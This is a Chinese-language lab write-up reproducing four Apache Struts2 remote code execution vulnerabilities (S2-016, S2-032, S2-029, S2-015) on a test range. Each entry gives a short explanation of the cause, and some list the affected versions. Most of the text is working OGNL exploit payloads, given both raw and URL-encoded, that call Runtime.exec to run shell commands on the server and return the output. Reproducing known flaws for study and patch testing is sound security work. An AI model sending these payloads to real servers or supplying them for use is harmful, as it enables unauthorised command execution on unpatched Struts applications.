Struts2漏洞复现

一. S2-016复现

1. 打开测试靶场，测试该网站存在index.action路径

2. 漏洞原理: 参数action的值redirect以及redirectAction没有正确过滤，导致ognl代码执行

3. 测试POC：

2.1     /index.action?redirect:%25{3*4}

2.2     /index.action?redirect:%25%7B3*4%7D   （经Url编码）

返回12，说明命令被执行了，即存在该漏洞！

3. 使用K8工具测试：

二. S2-032复现

1. 打开测试靶场，测试该网站存在index.action路径
2. 漏洞原理:

Struts2在开启了动态方法调用（动态方法调用）的情况下，可以使用method:的方式来调用调用的方法，而这个方法名将进行OGNL表达式计算，导致远程命令执行漏洞

3. 影响版本：
   Struts 2.3.20 - Struts Struts 2.3.28（2.3.20.3 和 2.3.24.3 除外）
4. 测试POC：

?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=ls

5. 工具测试：

三. S2-029复现

1. 打开测试靶场，分析源代码，发现存在发送弹幕接口：

http://xx.xx.xx.xx/?message=

2. 漏洞原理:

代码执行过程大致为先尝试获取value的值，如果value为空，那么就二次解释执行了name。并且在执行前给name加上了”%{}”。最终造成二次执行。因此需要的条件极为苛刻，特殊的代码，value值为空，可以传参到value，控制name，严格来说应该是个本地漏洞

3. 测试POC：

(#_memberAccess[‘allowPrivateAccess’]=true,#_memberAccess[‘allowProtectedAccess’]=true,#_memberAccess[‘excludedPackageNamePatterns’]=#_memberAccess[‘acceptProperties’],#_memberAccess[‘excludedClasses’]=#_memberAccess[‘acceptProperties’],#_memberAccess[‘allowPackageProtectedAccess’]=true,#_memberAccess[‘allowStaticMethodAccess’]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘ls’).getInputStream()))

URL编码：

%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%5b%27%61%6c%6c%6f%77%50%72%69%76%61%74%65%41%63%63%65%73%73%27%5d%3d%74%72%75%65%2c%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%5b%27%61%6c%6c%6f%77%50%72%6f%74%65%63%74%65%64%41%63%63%65%73%73%27%5d%3d%74%72%75%65%2c%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%5b%27%65%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%50%61%74%74%65%72%6e%73%27%5d%3d%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%5b%27%61%63%63%65%70%74%50%72%6f%70%65%72%74%69%65%73%27%5d%2c%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%5b%27%65%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%27%5d%3d%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%5b%27%61%63%63%65%70%74%50%72%6f%70%65%72%74%69%65%73%27%5d%2c%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%5b%27%61%6c%6c%6f%77%50%61%63%6b%61%67%65%50%72%6f%74%65%63%74%65%64%41%63%63%65%73%73%27%5d%3d%74%72%75%65%2c%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%5b%27%61%6c%6c%6f%77%53%74%61%74%69%63%4d%65%74%68%6f%64%41%63%63%65%73%73%27%5d%3d%74%72%75%65%2c%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%6c%73%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29

四. S2-015复现

1. 打开测试靶场：

2. 漏洞原理:

Apache Struts 2是用于开发JavaEE Web应用程序的开源Web应用框架。Apache Struts 2.0.0至2.3.14.2版本中存在远程命令执行漏洞。远程攻击者可借助带有‘${}’和‘%{}’序列值（可导致判断OGNL代码两次）的请求，利用该漏洞执行任意OGNL代码

3. 影响版本：2.0.0至2.3.14.2版本。

4. 测试POC：

${#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#m=#_memberAccess.getClass().getDeclaredField(‘allowStaticMethodAccess’),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘ls’).getInputStream()),#q}.action

URL编码：

/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27ls%27%29.getInputStream%28%29%29%2C%23q%7D.action

命令执行成功！
5. 工具执行测试：